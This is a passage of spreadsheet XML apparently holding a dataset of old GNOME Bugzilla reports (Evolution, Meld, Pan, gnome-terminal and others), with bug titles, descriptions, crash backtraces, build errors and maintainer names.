#19 0x407c47dc in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#20 0x407b4956 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#21 0x407c4406 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#22 0x407c3562 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#23 0x407c375b in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#24 0x08081031 in rb_library_walker_thread_go ()
No symbol table info available.
#25 0x40802be8 in g_timeout_add () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#26 0x4080044f in g_get_current_time () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#27 0x40801369 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#28 0x4080166f in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#29 0x40801cbe in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#30 0x4025c5d1 in bonobo_main () from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#31 0x0805f133 in main ()
No symbol table info available.
#32 0x40b62a51 in __libc_start_main () from /lib/libc.so.6
No symbol table info available.
#0  0x40be6b89 in wait4 () from /lib/libc.so.6
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-03-29 21:32 -------
Reassigning to the default owner of the component rhythmbox-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>bugzilla+gnome</t>
  </si>
  <si>
    <t>JHBUILD-622542</t>
  </si>
  <si>
    <t>module sets</t>
  </si>
  <si>
    <t>JHBUILD</t>
  </si>
  <si>
    <t>gnome-doc-utils doesnÂ´t compile</t>
  </si>
  <si>
    <t>Compiling crashes without a traceable reason
http://pastebin.com/0fAqk9T5
The error mentioned in line 412 seems to be quite useless
I tried with 2.30.2 but the same happens on me with 2.31.3 and GIT</t>
  </si>
  <si>
    <t>jhbuild-maint</t>
  </si>
  <si>
    <t>vamp898</t>
  </si>
  <si>
    <t>GNOME-TERMINAL-147312</t>
  </si>
  <si>
    <t>HIG Patches for Gtk+ Dialogs.</t>
  </si>
  <si>
    <t>I am attaching patches to HIGify the various gtk+ dialogs in gnome-terminal. 
Let me know if you need more details.</t>
  </si>
  <si>
    <t>gnome-terminal-maint</t>
  </si>
  <si>
    <t>dennis_cranston</t>
  </si>
  <si>
    <t>GNOME-TERMINAL-309201</t>
  </si>
  <si>
    <t>gnome-terminal doesn't match nntp or file URLs.</t>
  </si>
  <si>
    <t>This bug has been opened here: https://bugzilla.ubuntu.com/show_bug.cgi?id=12285
gnome-terminal 2.10.0-0ubuntu doesn't match URLs with a scheme of `nntp'
or `file' making it tedious to open said links in a browser.  I think
this is because
    $ grep 'define SCHEME' gnome-terminal-2.10.0/src/terminal-screen.c
    #define SCHEME    (news|telnet|nttp|file|https?|ftps?|webcal)
`nttp' is probably meant to be `nntp' and `file' is omitted.</t>
  </si>
  <si>
    <t>EVOLUTION-209350</t>
  </si>
  <si>
    <t>Darkgray bar is not updated</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
The dark gray bar at the top of the Evolution main window is not updated
when switching from any folder to the Summary folder.
Steps to reproduce the problem:
1. go to any fold e.g. Calendar
2. click in the shortcut list or in the tree on Summary
3. look at the dark gray bar at the top
Actual Results:
dark gray bar contains the text of the previous place (e.g. Calendar
September 9 2001) instead of a title for the Summary
Expected Results:
Title for the Summary
How often does this happen? 
always
Additional Information:</t>
  </si>
  <si>
    <t>Johann.Glaser</t>
  </si>
  <si>
    <t>GNUMERIC-54828</t>
  </si>
  <si>
    <t>Main System</t>
  </si>
  <si>
    <t>Irritating Rangesel behaviour</t>
  </si>
  <si>
    <t>1) Start Gnumeric
2) Navigate to cell C5
3) Enter something like =SUOM(A1:A10) (note the deliberate spelling error)
4) Try to move backwards with the left arrow key (which normally takes you
backwards through the text you entered)
*argh* for some reason you start navigating on the sheet with the
rangesel cursor. I think it's sensible to start rangesel mode if we had
typed =SUOM( But in this case there is no reason at all to jump into
rangesel mode because the expression is closed/finished.
Also when you try the above but enter the expression the edit line (not
on the sheet directly) things work as expected (you don't suddenly drop
into rangesel mode when trying move back)</t>
  </si>
  <si>
    <t>almer+gnomebugzilla</t>
  </si>
  <si>
    <t>GTETRINET-105061</t>
  </si>
  <si>
    <t>GTETRINET</t>
  </si>
  <si>
    <t>GTetrinet still needs some decent icons</t>
  </si>
  <si>
    <t>We still lack icons for the toolbar. Also it would be cool to put icons in
some other places like in the Winlist. That is use a icon instead of that
ugly 'T' in the first item of the Winlist. The same applies to the player
list in the partyline.</t>
  </si>
  <si>
    <t>gtetrinet-maint</t>
  </si>
  <si>
    <t>bocata</t>
  </si>
  <si>
    <t>TOTEM-304670</t>
  </si>
  <si>
    <t>GStreamer backend</t>
  </si>
  <si>
    <t>GStreamer 0.9 port</t>
  </si>
  <si>
    <t>Attached is first try at a 0.9 port.</t>
  </si>
  <si>
    <t>totem-gstreamer-maint</t>
  </si>
  <si>
    <t>rbultje</t>
  </si>
  <si>
    <t>GIMP-112061</t>
  </si>
  <si>
    <t>GIMPressionist orientfirst/orientlast change the wrong value</t>
  </si>
  <si>
    <t>When using GIMPressionist's Orientation settings Start angle and Angle
span what does change actually is the minimum/maximum size. The patch
below fixing the problem will perhaps make it clearer.</t>
  </si>
  <si>
    <t>bugzilla.gnome</t>
  </si>
  <si>
    <t>GDM-340960</t>
  </si>
  <si>
    <t>ssh.desktop not translatable</t>
  </si>
  <si>
    <t>The new ssh.desktop is not translatable so the session list has an english item when you use a non-english locale</t>
  </si>
  <si>
    <t>GNOME-SHELL-570583</t>
  </si>
  <si>
    <t>GNOME-SHELL</t>
  </si>
  <si>
    <t>window effects should handle tweens being overwritten</t>
  </si>
  <si>
    <t>In some situations a window is minimized and then immediately afterwards destroyed.  Seems to happen with apps that hide in the notification area particularly rhythmbox.  You probably need the patch from http://bugzilla.openedhand.com/show_bug.cgi?id=1363 to actually see the bug here.
When this happens the minimize tween's complete callback is never called as the tween is overwritten.  As a result the mutter_plugin_effect_completed is never called for the minimize effect so mutter doesn't hide the window.  The window stays on the screen at full size with its contents replaced by gray and it can't be focused and it doesn't accept any other input.
The window effect code should use tweener's overwrite callback to handle this.</t>
  </si>
  <si>
    <t>gnome-shell-maint</t>
  </si>
  <si>
    <t>BLUEFISH-328461</t>
  </si>
  <si>
    <t>application</t>
  </si>
  <si>
    <t>BLUEFISH</t>
  </si>
  <si>
    <t>Copy/Paste does not reproduce selected text correctly.</t>
  </si>
  <si>
    <t>Please describe the problem:
When trying to copy/paste with ctrl-x/v the following line
is reproduced as:
Steps to reproduce:
1. Select text containing elements
2. Copy/Paste using ctrl-c/v
3. everything from end of opening tag to end of selection appears first and
then begining of selection up to opening tag follows.
Actual results:
Expected results:
The copied string is reproduced exactly as it appeared originally
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>bluefish-maint</t>
  </si>
  <si>
    <t>David.Marrs</t>
  </si>
  <si>
    <t>MELD-485253</t>
  </si>
  <si>
    <t>filediff</t>
  </si>
  <si>
    <t>MELD</t>
  </si>
  <si>
    <t>selecting the Ignore changes which insert or delete blank lines doesn't work</t>
  </si>
  <si>
    <t>Please describe the problem:
Ticking or unticking the box under Preferences:Text Filters Ignore changes which insert or delete blank lines makes no difference to blank lines being flagged as changes. 
This bug invalidates being able to use regular expressions because the matched line is still shown as a change unless you put a blank line in the corresponding area on the other file
Steps to reproduce:
1. Make a new file comparison
2. Enter in the first file
asdf
asdf
asdf
3. Enter in the second file
asdf
asdf
asdf
4. Untick references:Text Filters Ignore changes which insert or delete blank lines
5. View the difference on the files (hit refresh to make sure)
6. Tick references:Text Filters Ignore changes which insert or delete blank lines
7. View the difference on the files (hit refresh to make sure)
Actual results:
The blank line in the second file is not ignored
Expected results:
when the option is unticked the blank line in the second file should be ignored
Does this happen every time?
yes
Other information:
version 1.1.4 from the Ubuntu repository</t>
  </si>
  <si>
    <t>stevek</t>
  </si>
  <si>
    <t>joel.duckworth</t>
  </si>
  <si>
    <t>EVOLUTION-349573</t>
  </si>
  <si>
    <t>evolution erroneously sends If-None-Match header when using caldav to DELETE an event</t>
  </si>
  <si>
    <t>Please describe the problem:
i am a developer for cosmo a caldav server. some of our users have reported that evolution 2.6 is unable to delete events from their caldav calendars.
it appears that when evolution sends a DELETE for an event resource it includes an If-None-Match header. taken from an example request trace:
DELETE /cosmo/home/lcd/Scooby/20060421T005015Z.ics HTTP/1.1
Host: 127.0.0.1:8080
If-None-Match: 944-1145580615365
Authorization: Basic bGNkOnNleHNleA==
User-Agent: Evolution/1.6.1
(i dunno what's up with that User-Agent header. i didn't get this trace output myself. the user says he's using evolution 2.6.)
as per the HTTP spec cosmo matches the etag specified in the If-None-Match header to the current etag of the resource in question. when it finds that the etags match it returns a 412 (precondition failed). to the user the delete operation apparently just doesn't seem to work.
i can't think of a reason that evolution should provide If-None-Match when deleting an event and i can't think of a reasonable way to work around the issue in cosmo. i believe cosmo is doing the right thing.
i don't have a linux box with a head on it so i can't directly observe the issue. the associated cosmo bug is at .
Steps to reproduce:
1. access a calendar on a cosmo server (or presumably any caldav server)
2. attempt to delete an event
Actual results:
unknown as i don't have the hardware to test the problem directly. the person who reported the cosmo bug simply said can't delete an event with evolution.
Expected results:
Does this happen every time?
apparently so.
Other information:</t>
  </si>
  <si>
    <t>kharish</t>
  </si>
  <si>
    <t>bcm</t>
  </si>
  <si>
    <t>EVOLUTION-330934</t>
  </si>
  <si>
    <t>mnemonics conflict in calendar context menu</t>
  </si>
  <si>
    <t>when having the save to disk plugin enabled _Delete and Save to _Disk use the same mnemonic in the calendar context menu.</t>
  </si>
  <si>
    <t>SYSTEM-MONITOR-324043</t>
  </si>
  <si>
    <t>gnome-system-monitor counts IOWAIT time as busy</t>
  </si>
  <si>
    <t>Version details: 2.13.2
Distribution/Version: Ubuntu Dapper
Forwarded from: http://bugzilla.ubuntu.com/show_bug.cgi?id=20973
In both the full app and the panel graphs of CPU utilization the system monitor
shows IOWAIT time as if it were busy.  For instance when updatedb runs it
shows the cpu as 100% utilized when in fact it is almost entirely idle because
that time is actually IOWAIT time.  It does this both with the visual graph and
with the numerical information you get when you hover the cursor over the panel.
 This is incorrect and/or misleading because the CPU is actually idle in iowait
time and those cycles could be used for other work.  
The memory usage panel is also misleading in that if you hover the cursor over
it right now mine says 95% in use of which 35% is cache when really only
50% of my memory is really used 35% is cache and the rest is buffers which
is just another form of cache.  This really should say 50% of memory is in use
or at least say that 50% is used for cache ( the 35% in cache plus 15% in
buffers ).  This is most noticiable when updatedb runs the memory usage graph
steadily climbs when it's just the buffer cache that is growing.  Also by
default the panel colors in buffers and cache memory on the graph so it looks
like it is in use.  This memory is really free so the default should be to not
color in that area but leave it black so it looks like it is free.  A user who
does not know better will look at the default graph and wonder why one earth
100% of their memory is used and think ubuntu sucks when half that memory is
really free.</t>
  </si>
  <si>
    <t>dholbach</t>
  </si>
  <si>
    <t>EVOLUTION-567744</t>
  </si>
  <si>
    <t>missing translator comment (wrong attribute)</t>
  </si>
  <si>
    <t>./evolution/plugins/groupwise-features/proxy-login-dialog.glade:  &lt;property
name=title translatable=yes comment=To Translators: In this case Proxy
does not mean something like 'HTTP Proxy' but a GroupWise feature by which one
person can send/read mails/appointments using another person's identity without
knowing his password for example if that other person is on vacation&gt;Proxy
Login
./evolution/plugins/groupwise-features/proxy-listing.glade:           &lt;property
name=label translatable=yes comment=To Translators: In this case Proxy
does not mean something like 'HTTP Proxy' but a GroupWise feature by which one
person can send/read mails/appointments using another person's identity without
knowing his password for example if that other person is on
vacation&gt;Proxy
The attribute should be comments (plural).</t>
  </si>
  <si>
    <t>evolution-plugin-maintainers</t>
  </si>
  <si>
    <t>GTK+-317444</t>
  </si>
  <si>
    <t>imime.c: GETTEXT_PACKAGE is not defined.</t>
  </si>
  <si>
    <t>Please describe the problem:
When imime.c is compiled GETTEXT_PACKAGE is used in glib\gi18n-lib.h before
defined.
So  should be included like other im*.c files.
Steps to reproduce:
1. compile imime.c
Actual results:
Following message is displayed. (Visual C++ 6.0)
gi18n-lib.h(27) : fatal error C1189: #error :  You must define GETTEXT_PACKAGE
before including gi18n-lib.h.
Expected results:
Add #include .
Does this happen every time?
every time
Other information:</t>
  </si>
  <si>
    <t>iwm</t>
  </si>
  <si>
    <t>GLADE-528552</t>
  </si>
  <si>
    <t>GLADE</t>
  </si>
  <si>
    <t>Unable to compile glade3 &gt; 3.4.1 on Windows with MinGW</t>
  </si>
  <si>
    <t>Please describe the problem:
During the linking phase of libgladeui-1-7.dll the linker complains about glade_util_widget_set_tooltip symbol (which is present in glade/glade-utils.h and nowhere) and stops with error.
Version 3.4.1 is OK whreas versions 3.4.2 and 3.4.3 present the problem.
I solved commenting out from glade/glade-utils.h the declaration of the function glade_util_widget_set_tooltip.
Steps to reproduce:
On Windows + MinGW + MSYS inside source dir of glade3 3.4.2 do
1. ./configure
2. make
Actual results:
The make process stops with error:
[...]
Creating library file: .libs/libgladeui-1.dll.a
Cannot export glade_util_widget_set_tooltip: symbol not defined
collect2: ld returned 1 exit status
make[3]: *** [libgladeui-1.la] Error 1
[...]
Expected results:
The make process finishes successfully.
Does this happen every time?
Yes
Other information:
Commenting out from glade/glade-utils.h the declaration of the function glade_util_widget_set_tooltip solves.</t>
  </si>
  <si>
    <t>glade3-maint</t>
  </si>
  <si>
    <t>gpz500</t>
  </si>
  <si>
    <t>GNOMORADIO-57703</t>
  </si>
  <si>
    <t>roboradio</t>
  </si>
  <si>
    <t>GNOMORADIO</t>
  </si>
  <si>
    <t>redo player</t>
  </si>
  <si>
    <t>gst</t>
  </si>
  <si>
    <t>garrison</t>
  </si>
  <si>
    <t>GTK+-65998</t>
  </si>
  <si>
    <t>XdndActionAsk support</t>
  </si>
  <si>
    <t>I saw that XDndActionList is set but XDndActionDescription is not contradicting
the Xdnd protocol
By the way I can't find any signs of support for GDK_ACTION_ASK.
Doesn't gtk support it ?</t>
  </si>
  <si>
    <t>GSTREAMER-168645</t>
  </si>
  <si>
    <t>libgst forgets to link with libm</t>
  </si>
  <si>
    <t>gstvalue.c calls floor() but -lm is missing from the final link commandline.
It happens that libxml2 drags libm into the link so this doesn't usually cause
a problem.  But if libxml2 is turned off via --disable-loadsave
--disable-registry  undefined symbol errors start showing up.</t>
  </si>
  <si>
    <t>EVOLUTION-306326</t>
  </si>
  <si>
    <t>GPG with multiple secret keys</t>
  </si>
  <si>
    <t>Please describe the problem:
Evolution does not seem great at dealing with signed/encrypted emails 
I have two key pairs (secret and public) in my GPG ring I think this
may be related
Sending seems to work fine but it only automatically decrypts emails
which have been encrypted using the first key in the ring and not all
of them.  Others I have to copy out into a text file and use gpg from
the command line.
Also if I send a signed email that has attachments when I look at the
email in Evolution I am told that the signature is invalid!  I have checked
this once (through gpg on the command line) and the signature appeared to be
correct.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
I rarely get an encrypted email that decrypts in Evolution.  I almost always
have to decrypt by hand - tedious.
Other information:</t>
  </si>
  <si>
    <t>mishd</t>
  </si>
  <si>
    <t>GVFS-515779</t>
  </si>
  <si>
    <t>[obsolete] hal volume monitor</t>
  </si>
  <si>
    <t>uses undefines hal symbols</t>
  </si>
  <si>
    <t>symbol lookup error: /opt/gnome-2.22/lib/gio/modules/libgiohal-volume-monitor.so: undefined symbol: libhal_ps_get_strlist
These symbols are only available in hal since 0.5.10 but configure only checks for &gt;= 0.5.9. 
Either
- update the configure check for &gt;= 0.5.10 and bump the required external dependency version on http://live.gnome.org/TwoPointTwentyone/ExternalDependencies or
- add a check for &gt;= 0.5.10 and compile the code only conditionally</t>
  </si>
  <si>
    <t>gvfs-maint</t>
  </si>
  <si>
    <t>MELD-690472</t>
  </si>
  <si>
    <t>Recent files is attempting to parse diff files as config files</t>
  </si>
  <si>
    <t>Code is current git HEAD
Running on Archlinux uninstalled (ie git clone then ./bin/meld)
A workaround is to just try / except the config.read(path) but I'm guessing there's some issue with the logic further up. Once it starts dealing with GTK recent file objects it's a little out of my depth.
[louis@PsykarBox meld]$ python2 -m meld.recent
Traceback (most recent call last):
  File /usr/lib/python2.7/runpy.py line 162 in _run_module_as_main
    __main__ fname loader pkg_name)
  File /usr/lib/python2.7/runpy.py line 72 in _run_code
    exec code in run_globals
  File /home/louis/tmp/meld/meld/recent.py line 215 in 
    recent = RecentFiles()
  File /home/louis/tmp/meld/meld/recent.py line 69 in __init__
    self._update_recent_files()
  File /home/louis/tmp/meld/meld/recent.py line 180 in _update_recent_files
    comp = self.read(uri)
  File /home/louis/tmp/meld/meld/recent.py line 122 in read
    config.read(path)
  File /usr/lib/python2.7/ConfigParser.py line 305 in read
    self._read(fp filename)
  File /usr/lib/python2.7/ConfigParser.py line 512 in _read
    raise MissingSectionHeaderError(fpname lineno line)
ConfigParser.MissingSectionHeaderError: File contains no section headers.
file: /mnt//portal.py line: 1
'\n'
portal.py is a file which was in a recently opened VC directory diff.
`items` in _filter_items() is a full list of all files which were in this diff in 'file:///' format.</t>
  </si>
  <si>
    <t>meld-maint</t>
  </si>
  <si>
    <t>psyker7</t>
  </si>
  <si>
    <t>EKIGA-64688</t>
  </si>
  <si>
    <t>EKIGA</t>
  </si>
  <si>
    <t>Disconnect crash</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnomemeeting
Severity: blocker
Version: 0.12
Synopsis: Disconnect crash
Bugzilla-Product: gnomemeeting
Bugzilla-Component: general
Description:
Me    : Have launch a connection
other : has launch a connection
me    : click on connect button of the window popup
          click on disconnect button of the GUI
Debugging Information:
[New Thread 1024 (LWP 6521)]
[New Thread 2049 (LWP 6529)]
[New Thread 1026 (LWP 6530)]
[New Thread 2051 (LWP 6531)]
[New Thread 3076 (LWP 6532)]
[New Thread 4101 (LWP 6533)]
[New Thread 8198 (LWP 6543)]
[New Thread 7176 (LWP 6542)]
0x41177689 in __wait4 () from /lib/libc.so.6
#0  0x41177689 in __wait4 () from /lib/libc.so.6
#1  0x411e0a58 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40ad7247 in waitpid (pid=6544 stat_loc=0xbfffd664 options=0)
    at wrapsyscall.c:173
#3  0x40c9f366 in gnome_segv_handle () from /opt/gnome/lib/libgnomeui.so.32
#4  0x40ad4eb4 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 0 
      esi = 1 ebp = 3221218156 esp = 3221215740 ebx = 1082412000 edx = 1 
      ecx = 1094714369 eax = 0 trapno = 14 err = 4 eip = 1077954065 
      cs = 35 __csh = 0 eflags = 66183 esp_at_signal = 3221215740 ss = 43 
      __ssh = 0 fpstate = 0xbfffd780 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
#5  
#6  0x40404611 in H323Connection::AnsweringCall () at eval.c:88
#7  0x8057fa4 in GnomeMeeting::Disconnect (this=0x80cbb40) at main.cpp:220
#8  0x8056d62 in disconnect_cb (widget=0x8138868 data=0x0)
    at callbacks.cpp:137
#9  0x40de11a9 in gtk_marshal_NONE__NONE () from /opt/gnome/lib/libgtk-1.2.so.0
#10 0x40e109ec in gtk_signal_remove_emission_hook ()
   from /opt/gnome/lib/libgtk-1.2.so.0
#11 0x40e0fe55 in gtk_signal_set_funcs () from /opt/gnome/lib/libgtk-1.2.so.0
#12 0x40e0df33 in gtk_signal_emit () from /opt/gnome/lib/libgtk-1.2.so.0
#13 0x40d7f088 in gtk_button_clicked () from /opt/gnome/lib/libgtk-1.2.so.0
#14 0x40d8060d in gtk_button_get_relief () from /opt/gnome/lib/libgtk-1.2.so.0
#15 0x40de11a9 in gtk_marshal_NONE__NONE () from /opt/gnome/lib/libgtk-1.2.so.0
#16 0x40e0fcef in gtk_signal_set_funcs () from /opt/gnome/lib/libgtk-1.2.so.0
#17 0x40e0df33 in gtk_signal_emit () from /opt/gnome/lib/libgtk-1.2.so.0
#18 0x40d7efc8 in gtk_button_released () from /opt/gnome/lib/libgtk-1.2.so.0
#19 0x40d7ff78 in gtk_button_get_relief () from /opt/gnome/lib/libgtk-1.2.so.0
#20 0x40de0e33 in gtk_marshal_BOOL__POINTER ()
   from /opt/gnome/lib/libgtk-1.2.so.0
#21 0x40e0fe93 in gtk_signal_set_funcs () from /opt/gnome/lib/libgtk-1.2.so.0
#22 0x40e0df33 in gtk_signal_emit () from /opt/gnome/lib/libgtk-1.2.so.0
#23 0x40e4494b in gtk_widget_event () from /opt/gnome/lib/libgtk-1.2.so.0
#24 0x40de0d85 in gtk_propagate_event () from /opt/gnome/lib/libgtk-1.2.so.0
#25 0x40ddfeee in gtk_main_do_event () from /opt/gnome/lib/libgtk-1.2.so.0
#26 0x40e8e127 in gdk_wm_protocols_filter ()
   from /opt/gnome/lib/libgdk-1.2.so.0
#27 0x40ff3308 in g_get_current_time () from /opt/gnome/lib/libglib-1.2.so.0
#28 0x40ff3913 in g_get_current_time () from /opt/gnome/lib/libglib-1.2.so.0
#29 0x40ff3aac in g_main_run () from /opt/gnome/lib/libglib-1.2.so.0
#30 0x40ddf7e7 in gtk_main () from /opt/gnome/lib/libgtk-1.2.so.0
#31 0x80581a5 in main (argc=1 argv=0xbffff164 envp=0xbffff16c)
    at main.cpp:291
#32 0x410f22eb in __libc_start_main (main=0x8058028  argc=1 
    ubp_av=0xbffff164 init=0x80546f8  fini=0x806e308  
    rtld_fini=0x4000c130  stack_end=0xbffff15c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x41177689 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x411e0a58 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40ad7247 in waitpid (pid=6544 stat_loc=0xbfffd664 options=0)
    at wrapsyscall.c:173
Current language:  auto currently c
stat_loc = (int *) 0xbfffd664
options = 0
result = 0
oldtype = 0
#3  0x40c9f366 in gnome_segv_handle () from /opt/gnome/lib/libgnomeui.so.32
No symbol table info available.
#4  0x40ad4eb4 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 0 
      esi = 1 ebp = 3221218156 esp = 3221215740 ebx = 1082412000 edx = 1 
      ecx = 1094714369 eax = 0 trapno = 14 err = 4 eip = 1077954065 
      cs = 35 __csh = 0 eflags = 66183 esp_at_signal = 3221215740 ss = 43 
      __ssh = 0 fpstate = 0xbfffd780 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
self = 0x40adde20
in_sighandler = 0x0
#5  
No locals.
#6  0x40404611 in H323Connection::AnsweringCall () at eval.c:88
No locals.
#7  0x8057fa4 in GnomeMeeting::Disconnect (this=0x80cbb40) at main.cpp:220
220		      connection-&gt;AnsweringCall (H323Connection::AnswerCallDenied)	
Current language:  auto currently c++
this = (GnomeMeeting *) 0x80cbb40
connection = (struct H323Connection *) 0x0
current_call_token = 
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-11-16 03:56 -------
The original reporter (francois@tanna.citb.bull.net) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component dsandras@seconix.com.
</t>
  </si>
  <si>
    <t>dsandras</t>
  </si>
  <si>
    <t>francois</t>
  </si>
  <si>
    <t>NAUTILUS-41742</t>
  </si>
  <si>
    <t>File Search Interface</t>
  </si>
  <si>
    <t>Delete in search view should delete actual files</t>
  </si>
  <si>
    <t xml:space="preserve">when viewing search results a user should be able to select a file and delete
it as they would a normal file.  This should remove the file from its normal
location on disk and place it in the trash.  
the decision was made that this was a feature important for inclusion in 1.0.
------- Additional Comments From rebecka@eazel.com 2000-07-27 09:38:17 ----
this bug may be deferred so i am marking it p5
------- Additional Comments From sullivan@eazel.com 2000-08-02 17:34:48 ----
Reassigning bugs.
------- Additional Comments From sullivan@eazel.com 2000-09-08 15:28:00 ----
Setting all bugs to P6 to start official bug-prioritization plan. Please don't
set the priority to anything other than P6 unless you've got the gold seal of
approval for doing so.
------- Additional Comments From eli@eazel.com 2000-10-16 18:59:40 ----
Batch-assigning QA ownership of Search Interface bugs to Josh Barrow.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:33 -------
Bug depends on bug(s) 42075.
Bug blocks bug(s) 41743.
</t>
  </si>
  <si>
    <t>sullivan</t>
  </si>
  <si>
    <t>rebecka</t>
  </si>
  <si>
    <t>EVOLUTION-203661</t>
  </si>
  <si>
    <t>Severe memory leak</t>
  </si>
  <si>
    <t>When Evolution starts it uses about 27 Meg (on my 512 Meg dual PIII 500
system). Soon after launch the memory use climbs steadily. After just five
minutes it is up to 38 Meg. After about 12 hours it crashes my machine
after it uses up all free RAM and swap space.
I am checking email every minute and the memory leak may be correlated 
with an email check operation. (I am running a POP3 server - qmail).</t>
  </si>
  <si>
    <t>notzed</t>
  </si>
  <si>
    <t>RandyKahle</t>
  </si>
  <si>
    <t>GNOME-NETTOOL-394648</t>
  </si>
  <si>
    <t>GNOME-NETTOOL</t>
  </si>
  <si>
    <t>gnome-nettool has documentation but this documentation is not accesible through the interface</t>
  </si>
  <si>
    <t>gnome-nettool has documentation which gets installed and is thus accessible in Yelp there is no way to access the documentation from gnome-nettool however. (There seem to be problems with the Yelp search currently to find the gnome-nettool documentation I searched for plugin.)
Here is a patch that adds a button to the help menu to access the documentation.
This adds a dependency on libgnome if this is a problem I can do another patch which makes this conditional.
Hope this helps.
Love Karderio.</t>
  </si>
  <si>
    <t>gpoo</t>
  </si>
  <si>
    <t>karderio</t>
  </si>
  <si>
    <t>BRASERO-615606</t>
  </si>
  <si>
    <t>Format String issues in brasero-data-disc</t>
  </si>
  <si>
    <t>gtk_message_dialog_format_secondary_text expects a format string so 
give it a proper literal format string.</t>
  </si>
  <si>
    <t>gnome-bugs</t>
  </si>
  <si>
    <t>LIBSOUP-480987</t>
  </si>
  <si>
    <t>HTTP Transport</t>
  </si>
  <si>
    <t>LIBSOUP</t>
  </si>
  <si>
    <t>libsoup-2.2.96 crashes when the password is null for NTLM authentication</t>
  </si>
  <si>
    <t>Should be more resilient than this.</t>
  </si>
  <si>
    <t>wendell</t>
  </si>
  <si>
    <t>EVOLUTION-324410</t>
  </si>
  <si>
    <t>User Documentation</t>
  </si>
  <si>
    <t>Create new contacts group is unavailable - documentation</t>
  </si>
  <si>
    <t>Please describe the problem:
I have many contacts and I want to organize them. I looked trought evoulution
help and found that I can do this with Contacts Groups. But I do not have menu
item File &gt; New &gt; Contacts Group. I have Contact Contact List and Address book...
How can I fix this problem?
Thank you for your time
Peter.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>mmoulder</t>
  </si>
  <si>
    <t>PAN-172515</t>
  </si>
  <si>
    <t>Crashes when fetching a particular message</t>
  </si>
  <si>
    <t>Version details: 0.14.90
Distribution/Version: Windows XP
This pertains to pan-cvs-20050311.exe. It crashes every time when trying to
fetch this one particular message. The message has been removed from the server
by its author so here it is in full:
Xref: localhost pl.rec.gry.konsole:5586
Date: Sat 02 Apr 2005 23:18:40 +0200
From: spdk 
User-Agent: Mozilla Thunderbird 0.9 (Windows/20041103)
X-Accept-Language: en-us en
MIME-Version: 1.0
Newsgroups: pl.rec.gry.konsole
Subject: Re: 
References: 
In-Reply-To: 
Content-Type: text/plain charset=ISO-8859-2 format=flowed
Content-Transfer-Encoding: quoted-printable
NNTP-Posting-Host: 62.121.81.202
Message-ID: 
X-Trace: news.home.net.pl 1112476531 62.121.81.202 (2 Apr 2005 23:15:31 +0200)
Organization: home.pl news server
Lines: 11
X-Authenticated-User: michal.world
Path:
nemesis.news.tpi.pl!news.tpi.pl!newsfeed.tpinternet.pl!opal.futuro.pl!newsfeed.gazeta.pl!news.internetia.pl!news.ipartners.pl!news.home.net.pl!not-for-mail
X-Old-Xref: nemesis.news.tpi.pl pl.rec.gry.konsole:247276
Tyka wrote:
&gt; Obok =B6wieczki wpisz swoje
&gt; imi=EA Roze=B6lij to do wszystkich.
*PLONK*
--=20
pozdrawiam
Michal czasem zwany spodkiem
michal [at] world [dot] pl
Are you stupid Uriel?! Japanese people don't have souls!
The problem must lie in the headers because Pan crashes when fetching them
besides I changed the message body and Pan still crashed.</t>
  </si>
  <si>
    <t>arturj</t>
  </si>
  <si>
    <t>METACITY-91065</t>
  </si>
  <si>
    <t>METACITY</t>
  </si>
  <si>
    <t>translations in schema file are not valid utf8 strings</t>
  </si>
  <si>
    <t>I can't read metacity.schema in GEdit2 and
gconf-editer shows wrong messages
for short and long. It must be encoded wrong
format.
I'm using locale ko_KR.euckr.</t>
  </si>
  <si>
    <t>metacity-maint</t>
  </si>
  <si>
    <t>krisna</t>
  </si>
  <si>
    <t>GHEX-7573</t>
  </si>
  <si>
    <t>GHEX</t>
  </si>
  <si>
    <t>ghex crashes when invoking Settings twice.</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-utils
Severity: normal
Version: 1.1.0
&gt;Synopsis: ghex crashes when invoking Settings twice.
&gt;Class: sw-bug
Distribution: Red Hat Linux release 6.1 (Cartman)
System: Linux 2.3.49 i686 unknown
C library: glibc-2.1.2-11
C compiler: egcs-2.91.66
glib: 1.2.7
GTK+: 1.2.7
ORBit: ORBit 0.5.1
gnome-libs: gnome-libs 1.0.56
gnome-core: gnome-core 1.1.5
&gt;Description:
Invoking the menu Settings for the second time
(even without changing anything) results in
a segmentation fault.
&gt;How-To-Repeat:
Invoke the Setting menu twice.
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
